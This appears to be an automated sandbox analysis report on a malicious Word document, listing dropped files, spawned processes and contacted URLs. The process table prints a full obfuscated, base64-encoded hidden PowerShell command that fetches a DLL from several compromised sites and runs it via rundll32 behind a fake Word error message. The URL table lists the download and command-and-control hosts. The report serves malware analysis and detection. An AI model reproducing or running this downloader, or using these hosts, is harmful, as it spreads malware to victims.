Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
FP4554867134UQ.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Unbranded driver PCI
deposit Avon turquoise bluetooth indexing coherent markets, Author: Ximena Porras, Template: Normal.dotm, Revision Number:
1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 21:01:00 2021, Last Saved Time/Date:
Fri Jan 22 21:01:00 2021, Number of Pages: 1, Number of Words: 3201, Number of Characters: 18248, Security: 8
|
initial sample
|
||
C:\Users\user\E8j9w_l\Ys1wun5\I45Q.dll
|
data
|
modified
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 58936 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{787A42EB-DE8E-4300-98F0-AE5841A8170E}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{83A1AA3C-A4A2-4116-9FFA-5D688B84E1DE}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\CabFA37.tmp
|
Microsoft Cabinet archive data, 58936 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\TarFA38.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FP4554867134UQ.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13
2020, mtime=Wed Aug 26 14:08:13 2020, atime=Mon Jan 25 22:12:35 2021, length=172544, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ENOZYO9EK35YCP6ZKW8L.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$4554867134UQ.doc
|
data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IABzAEUAVAAgACgAIgA4AHoAdwAiACsAIgBIACIAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADMAfQB7ADUAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAE8AcgB5ACcALAAnAEUAYwB0ACcALAAnAFMAeQBTAHQAZQAnACwAJwBvAC4AZAAnACwAJwBtAC4AaQAnACwAJwBJAFIAJwApACAAIAApACAAOwBzAGUAVAAgACAAKAAnAEQAQwAnACsAJwB1AFIAJwApACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewAwAH0AewA4AH0AewA0AH0AewA5AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AewA1AH0AewA3AH0AIgAgAC0ARgAgACcAUwB5AHMAJwAsACcARQBSACcALAAnAFMAJwAsACcAdgAnACwAJwAuAE4ARQBUACcALAAnAG8AaQBuAFQAbQBhACcALAAnAGkAYwBFAFAAJwAsACcATgBBAGcAZQByACcALAAnAHQARQBNACcALAAnAC4AJwApACAAKQAgADsAJABUAHQAZQAyAGEAdAAxAD0AJABLADYAMgBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABTADcAMABNADsAJABJADQAXwBKAD0AKAAnAFUAMAAnACsAJwA2AEkAJwApADsAIAAoACAAZwBlAHQALQB2AGEAUgBpAEEAQgBsAEUAIAAoACIAOABaAHcAIgArACIASAAiACkAIAAtAHYAQQBsAHUAZQBvAG4AbAAgACkAOgA6ACIAQwByAEUAQQBgAFQAZQBgAGQASQBSAGAAZQBjAFQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZwA3AGkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqADkAJwArACcAdwAnACkAKwAoACcAXwAnACsAJwBsAGcAJwArACcANwBpAFkAcwAxAHcAJwArACcAdQAnACkAKwAoACcAbgA1ACcAKwAnAGcANwBpACcAKQApACAAIAAtAEMAcgBFAFAATABhAEMARQAoAFsAQwBIAGEAUgBdADEAMAAzACsAWwBDAEgAYQBSAF0ANQA1ACsAWwBDAEgAYQBSAF0AMQAwADUAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAEUAOAA2AFAAPQAoACcAVwAyACcAKwAnADIAVQAnACkAOwAgACAAKAAgACAASQB0AGUAbQAgACgAIgBWACIAKwAiAGEAUgBJAEEAQgBMACIAKwAiAGUAOgBEAEMAVQBSACIAKQAgACAAKQAuAFYAQQBsAHUARQA6ADoAIgBzAGUAYwB1AFIAYABJAFQAWQBQAFIAbwBgAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABFADUAOABDAD0AKAAoACcATQAnACsAJwA1ADAAJwApACsAJwBWACcAKQA7ACQASQB2AGYAdAB5AHAAdwAgAD0AIAAoACgAJwBJADQAJwArACcANQAnACkAKwAnAFEAJwApADsAJABaADAANwBJAD0AKAAoACcAVAAxACcAKwAnADEAJwApACsAJwBDACcAKQA7ACQASwBwAHoAZAA3AGMAZQA9ACQASABPAE0ARQArACgAKAAoACcAMQAwADkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqACcAKwAnADkAdwAnACkAKwAoACcAXwBsADEAMAA5AFkAcwAnACsAJwAxACcAKwAnAHcAJwApACsAJwB1AG4AJwArACcANQAxACcAKwAnADAAOQAnACkALgAiAHIARQBwAGAAbABhAEMARQAiACgAKABbAGMASABhAHIAXQA0ADkAKwBbAGMASABhAHIAXQA0ADgAKwBbAGMASABhAHIAXQA1ADcAKQAsAFsAUwBUAFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABJAHYAZgB0AHkAcAB3ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABTADEANwBCAD0AKAAnAE8AJwArACgAJwA1ADIAJwArACcARAAnACkAKQA7ACQATwBjAHkAZQB4AHMAMAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFcAYwB5AGIAZwAxADcAPQAoACcAeAAnACsAJwAgAFsAJwArACgAJwAgACcAKwAnAHMAaAAnACkAKwAoACcAIAAnACsAJwBiADoALwAvACcAKQArACgAJwBkAHIAaQBwAHMAdwBlACcAKwAnAGUAdAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGEAJwArACcAZABtAGkAbgAvAGcAJwArACcAVABpAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACsAJwAgAHMAaAAgAGIAOgAnACsAJwAvAC8AagAnACkAKwAoACcAYgBzAG0AZQAnACsAJwBkACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAdgBlAG4AJwApACsAKAAnAHQAdQByACcAKwAnAGUAcwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAvAFYAJwArACcALwAhAHgAJwArACcAIABbACcAKQArACcAIABzACcAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAHIAJwArACcAMwAtAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACcALgBiACcAKwAoACcAaQB6ACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACsAJwBWAFQALwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACkAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgA6AC8ALwB5AGEAJwArACcAZwBpACcAKQArACgAJwBuACcAKwAnAGMAJwArACcALgBjAG8AbQAvAGkAbQBhAGcAZQBzACcAKwAnAC8AdABrAC8AIQAnACsAJwB4ACAAWwAgACcAKQArACgAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAoACcALwBuAG8AdgAnACsAJwBvADIAJwArACcALgAnACkAKwAoACcAZABlACcAKwAnAHUAcwAnACsAJwBzAGEAbAB2ACcAKwAnAGUAbwBiAHIAYQBzAGkAJwApACsAKAAnAGwALgBjAG8AJwArACcAbQAnACkAKwAnAC4AYgAnACsAJwByACcAKwAoACcALwB0AHIAYQAnACsAJwBjAHQAbwAnACkAKwAnAHIALQAnACsAJwBwACcAKwAoACcAYQAnACsAJwByAHQAJwApACsAJwBzAC0AJwArACcAZwBoACcAKwAoACcAMgAnACsAJwA4AGMALwA5AC8AIQAnACkAKwAoACcAeAAgAFsAIAAnACsAJwBzACcAKQArACgAJwBoACAAJwArACcAYgA6AC8AJwApACsAKAAnAC8AdAByAGUAawBrACcAKwAnAGkAbgAnACkAKwAoACcAZwBmAGUAcwB0ACcAKwAnAGkAdgAnACsAJwBhAGwAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwBkACcAKwAnAGUAbQAnACsAJwBvAC8AJwArACcAQwAvACEAeAAgAFsAIABzACcAKQArACgAJwBoACAAYgA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAbgBhAHIAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwBkAGEAJwArACcALgBtAHkAawBmACcAKQArACgAJwBuACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AYQBwAHAALwAnACsAJwBEAHEASwAnACsAJwBHADEALwAnACkAKQAuACIAcgBlAGAAcABsAGAAQQBDAGUAIgAoACgAKAAnAHgAIAAnACsAJwBbACcAKQArACgAJwAgACcAKwAnAHMAaAAnACkAKwAnACAAYgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE8AYwB5AGUAeABzADAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAHQAIgAoACQAWQA3ADAAQQAgACsAIAAkAFQAdABlADIAYQB0ADEAIAArACAAJABLADEAOABWACkAOwAkAFYAMwAwAFkAPQAoACcAQQA3ACcAKwAnADkAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAYQB3ADEAOABxADUAIABpAG4AIAAkAFcAYwB5AGIAZwAxADcAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAFMAWQBzAFQARQBNAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBlAE4AVAApAC4AIgBkAE8AdwBgAE4ATABgAE8AYQBEAEYAaQBgAGwARQAiACgAJABMAGEAdwAxADgAcQA1ACwAIAAkAEsAcAB6AGQANwBjAGUAKQA7ACQARAA1ADcARwA9ACgAJwBLADAAJwArACcAOQBYACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABLAHAAegBkADcAYwBlACkALgAiAGwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAA0ADgAOAAzADEAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASwBwAHoAZAA3AGMAZQAsACgAKAAnAEEAbgAnACsAJwB5AFMAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACcAbgBnACcAKQAuACIAdABPAGAAcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQARwA0ADAAUwA9ACgAKAAnAFkANwAnACsAJwA4ACcAKQArACcATwAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMwA4AEEAPQAoACcARwA3ACcAKwAnADQAWAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANAA3AFEAPQAoACgAJwBaADgAJwArACcANQAnACkAKwAnAEgAJwApAA==
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IABzAEUAVAAgACgAIgA4AHoAdwAiACsAIgBIACIAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADMAfQB7ADUAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAE8AcgB5ACcALAAnAEUAYwB0ACcALAAnAFMAeQBTAHQAZQAnACwAJwBvAC4AZAAnACwAJwBtAC4AaQAnACwAJwBJAFIAJwApACAAIAApACAAOwBzAGUAVAAgACAAKAAnAEQAQwAnACsAJwB1AFIAJwApACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewAwAH0AewA4AH0AewA0AH0AewA5AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AewA1AH0AewA3AH0AIgAgAC0ARgAgACcAUwB5AHMAJwAsACcARQBSACcALAAnAFMAJwAsACcAdgAnACwAJwAuAE4ARQBUACcALAAnAG8AaQBuAFQAbQBhACcALAAnAGkAYwBFAFAAJwAsACcATgBBAGcAZQByACcALAAnAHQARQBNACcALAAnAC4AJwApACAAKQAgADsAJABUAHQAZQAyAGEAdAAxAD0AJABLADYAMgBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABTADcAMABNADsAJABJADQAXwBKAD0AKAAnAFUAMAAnACsAJwA2AEkAJwApADsAIAAoACAAZwBlAHQALQB2AGEAUgBpAEEAQgBsAEUAIAAoACIAOABaAHcAIgArACIASAAiACkAIAAtAHYAQQBsAHUAZQBvAG4AbAAgACkAOgA6ACIAQwByAEUAQQBgAFQAZQBgAGQASQBSAGAAZQBjAFQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZwA3AGkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqADkAJwArACcAdwAnACkAKwAoACcAXwAnACsAJwBsAGcAJwArACcANwBpAFkAcwAxAHcAJwArACcAdQAnACkAKwAoACcAbgA1ACcAKwAnAGcANwBpACcAKQApACAAIAAtAEMAcgBFAFAATABhAEMARQAoAFsAQwBIAGEAUgBdADEAMAAzACsAWwBDAEgAYQBSAF0ANQA1ACsAWwBDAEgAYQBSAF0AMQAwADUAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAEUAOAA2AFAAPQAoACcAVwAyACcAKwAnADIAVQAnACkAOwAgACAAKAAgACAASQB0AGUAbQAgACgAIgBWACIAKwAiAGEAUgBJAEEAQgBMACIAKwAiAGUAOgBEAEMAVQBSACIAKQAgACAAKQAuAFYAQQBsAHUARQA6ADoAIgBzAGUAYwB1AFIAYABJAFQAWQBQAFIAbwBgAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABFADUAOABDAD0AKAAoACcATQAnACsAJwA1ADAAJwApACsAJwBWACcAKQA7ACQASQB2AGYAdAB5AHAAdwAgAD0AIAAoACgAJwBJADQAJwArACcANQAnACkAKwAnAFEAJwApADsAJABaADAANwBJAD0AKAAoACcAVAAxACcAKwAnADEAJwApACsAJwBDACcAKQA7ACQASwBwAHoAZAA3AGMAZQA9ACQASABPAE0ARQArACgAKAAoACcAMQAwADkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqACcAKwAnADkAdwAnACkAKwAoACcAXwBsADEAMAA5AFkAcwAnACsAJwAxACcAKwAnAHcAJwApACsAJwB1AG4AJwArACcANQAxACcAKwAnADAAOQAnACkALgAiAHIARQBwAGAAbABhAEMARQAiACgAKABbAGMASABhAHIAXQA0ADkAKwBbAGMASABhAHIAXQA0ADgAKwBbAGMASABhAHIAXQA1ADcAKQAsAFsAUwBUAFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABJAHYAZgB0AHkAcAB3ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABTADEANwBCAD0AKAAnAE8AJwArACgAJwA1ADIAJwArACcARAAnACkAKQA7ACQATwBjAHkAZQB4AHMAMAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFcAYwB5AGIAZwAxADcAPQAoACcAeAAnACsAJwAgAFsAJwArACgAJwAgACcAKwAnAHMAaAAnACkAKwAoACcAIAAnACsAJwBiADoALwAvACcAKQArACgAJwBkAHIAaQBwAHMAdwBlACcAKwAnAGUAdAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGEAJwArACcAZABtAGkAbgAvAGcAJwArACcAVABpAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACsAJwAgAHMAaAAgAGIAOgAnACsAJwAvAC8AagAnACkAKwAoACcAYgBzAG0AZQAnACsAJwBkACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAdgBlAG4AJwApACsAKAAnAHQAdQByACcAKwAnAGUAcwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAvAFYAJwArACcALwAhAHgAJwArACcAIABbACcAKQArACcAIABzACcAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAHIAJwArACcAMwAtAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACcALgBiACcAKwAoACcAaQB6ACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACsAJwBWAFQALwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACkAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgA6AC8ALwB5AGEAJwArACcAZwBpACcAKQArACgAJwBuACcAKwAnAGMAJwArACcALgBjAG8AbQAvAGkAbQBhAGcAZQBzACcAKwAnAC8AdABrAC8AIQAnACsAJwB4ACAAWwAgACcAKQArACgAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAoACcALwBuAG8AdgAnACsAJwBvADIAJwArACcALgAnACkAKwAoACcAZABlACcAKwAnAHUAcwAnACsAJwBzAGEAbAB2ACcAKwAnAGUAbwBiAHIAYQBzAGkAJwApACsAKAAnAGwALgBjAG8AJwArACcAbQAnACkAKwAnAC4AYgAnACsAJwByACcAKwAoACcALwB0AHIAYQAnACsAJwBjAHQAbwAnACkAKwAnAHIALQAnACsAJwBwACcAKwAoACcAYQAnACsAJwByAHQAJwApACsAJwBzAC0AJwArACcAZwBoACcAKwAoACcAMgAnACsAJwA4AGMALwA5AC8AIQAnACkAKwAoACcAeAAgAFsAIAAnACsAJwBzACcAKQArACgAJwBoACAAJwArACcAYgA6AC8AJwApACsAKAAnAC8AdAByAGUAawBrACcAKwAnAGkAbgAnACkAKwAoACcAZwBmAGUAcwB0ACcAKwAnAGkAdgAnACsAJwBhAGwAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwBkACcAKwAnAGUAbQAnACsAJwBvAC8AJwArACcAQwAvACEAeAAgAFsAIABzACcAKQArACgAJwBoACAAYgA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAbgBhAHIAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwBkAGEAJwArACcALgBtAHkAawBmACcAKQArACgAJwBuACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AYQBwAHAALwAnACsAJwBEAHEASwAnACsAJwBHADEALwAnACkAKQAuACIAcgBlAGAAcABsAGAAQQBDAGUAIgAoACgAKAAnAHgAIAAnACsAJwBbACcAKQArACgAJwAgACcAKwAnAHMAaAAnACkAKwAnACAAYgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE8AYwB5AGUAeABzADAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAHQAIgAoACQAWQA3ADAAQQAgACsAIAAkAFQAdABlADIAYQB0ADEAIAArACAAJABLADEAOABWACkAOwAkAFYAMwAwAFkAPQAoACcAQQA3ACcAKwAnADkAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAYQB3ADEAOABxADUAIABpAG4AIAAkAFcAYwB5AGIAZwAxADcAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAFMAWQBzAFQARQBNAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBlAE4AVAApAC4AIgBkAE8AdwBgAE4ATABgAE8AYQBEAEYAaQBgAGwARQAiACgAJABMAGEAdwAxADgAcQA1ACwAIAAkAEsAcAB6AGQANwBjAGUAKQA7ACQARAA1ADcARwA9ACgAJwBLADAAJwArACcAOQBYACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABLAHAAegBkADcAYwBlACkALgAiAGwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAA0ADgAOAAzADEAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASwBwAHoAZAA3AGMAZQAsACgAKAAnAEEAbgAnACsAJwB5AFMAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACcAbgBnACcAKQAuACIAdABPAGAAcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQARwA0ADAAUwA9ACgAKAAnAFkANwAnACsAJwA4ACcAKQArACcATwAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMwA4AEEAPQAoACcARwA3ACcAKwAnADQAWAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANAA3AFEAPQAoACgAJwBaADgAJwArACcANQAnACkAKwAnAEgAJwApAA==
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\E8j9w_l\Ys1wun5\I45Q.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\E8j9w_l\Ys1wun5\I45Q.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\E8j9w_l\Ys1wun5\I45Q.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qcpfo\eqvz.qqk',RYcPJUbXC
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qcpfo\eqvz.qqk',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hovpjjuylntjr\igbqisilqspc.cpw',sVHRJpl
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hovpjjuylntjr\igbqisilqspc.cpw',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqxnxhrbagdqbq\ozuzyrizmlvso.ghb',ZtLfkSoswLf
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqxnxhrbagdqbq\ozuzyrizmlvso.ghb',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 3 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.r3-tech.biz/wp-admin/VT/
|
unknown
|
||
http://narmada.mykfn.com/app/DqKG1/P
|
unknown
|
||
http://jbsmediaventures.com/cgi-sys/suspendedpage.cgi
|
192.232.250.227
|
||
http://trekkingfestival.com/demo/C/
|
unknown
|
||
http://novo2.deussalveobrasil.com.br/tractor-parts-gh28c/9/
|
unknown
|
||
http://jbsmediaventures.com
|
unknown
|
||
http://narmada.mykfn.com/app/DqKG1/
|
unknown
|
||
http://jbsmediaventures.comh
|
unknown
|
||
http://dripsweet.com
|
unknown
|
||
http://195.159.28.230:8080/1kewy5snl5u5qwd1i/2m2zjf0onqwa3jb46/txmdgqo8th3cjzzn3/e09y7w1/n16qjyb3buse6byb/1xkxxrlbgrsn7c/
|
195.159.28.230
|
||
http://dripsweet.com/wp-admin/gTiO/
|
172.67.215.216
|
||
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
|
unknown
|
||
http://www.a-cert.at0E
|
unknown
|
||
http://www.certplus.com/CRL/class3.crl0
|
unknown
|
||
http://www.e-me.lv/repository0
|
unknown
|
||
http://www.acabogacia.org/doc0
|
unknown
|
||
http://crl.chambersign.org/chambersroot.crl0
|
unknown
|
||
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
|
unknown
|
||
http://www.certifikat.dk/repository0
|
unknown
|
||
http://www.chambersign.org1
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://www.pkioverheid.nl/policies/root-policy0
|
unknown
|
||
http://repository.swisssign.com/0
|
unknown
|
||
http://crl.ssc.lt/root-c/cacrl.crl0
|
unknown
|
||
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
|
unknown
|
||
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
|
unknown
|
||
http://ca.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://repository.infonotary.com/cps/qcps.html0$
|
unknown
|
||
http://www.post.trust.ie/reposit/cps.html0
|
unknown
|
||
http://www.certplus.com/CRL/class2.crl0
|
unknown
|
||
http://www.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://ocsp.infonotary.com/responder.cgi0V
|
unknown
|
||
http://www.sk.ee/cps/0
|
unknown
|
||
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
|
unknown
|
||
http://servername/isapibackend.dll
|
unknown
|
||
http://www.ssc.lt/cps03
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://crl.oces.certifikat.dk/oces.crl0
|
unknown
|
||
http://crl.ssc.lt/root-b/cacrl.crl0
|
unknown
|
||
http://www.certicamara.com/dpc/0Z
|
unknown
|
||
http://crl.pki.wellsfargo.com/wsprca.crl0
|
unknown
|
||
http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0
|
unknown
|
||
http://www.dnie.es/dpc0
|
unknown
|
||
http://www.rootca.or.kr/rca/cps.html0
|
unknown
|
||
http://www.trustcenter.de/guidelines0
|
unknown
|
||
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.certplus.com/CRL/class3TS.crl0
|
unknown
|
||
http://www.entrust.net/CRL/Client1.crl0
|
unknown
|
||
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
https://www.catcert.net/verarrel
|
unknown
|
||
http://www.disig.sk/ca0f
|
unknown
|
||
http://www.e-szigno.hu/RootCA.crl
|
unknown
|
||
http://www.sk.ee/juur/crl/0
|
unknown
|
||
http://crl.chambersign.org/chambersignroot.crl0
|
unknown
|
||
http://crl.xrampsecurity.com/XGCA.crl0
|
unknown
|
||
http://crl.ssc.lt/root-a/cacrl.crl0
|
unknown
|
||
http://www.trustdst.com/certificates/policy/ACES-index.html0
|
unknown
|
||
http://www.firmaprofesional.com0
|
unknown
|
||
https://www.netlock.net/docs
|
unknown
|
||
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
|
unknown
|
||
http://www.e-trust.be/CPS/QNcerts
|
unknown
|
||
http://www.certicamara.com/certicamaraca.crl0
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
|
unknown
|
||
http://fedir.comsign.co.il/crl/ComSignCA.crl0
|
unknown
|
||
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
|
unknown
|
||
http://cps.chambersign.org/cps/chambersroot.html0
|
unknown
|
||
http://www.acabogacia.org0
|
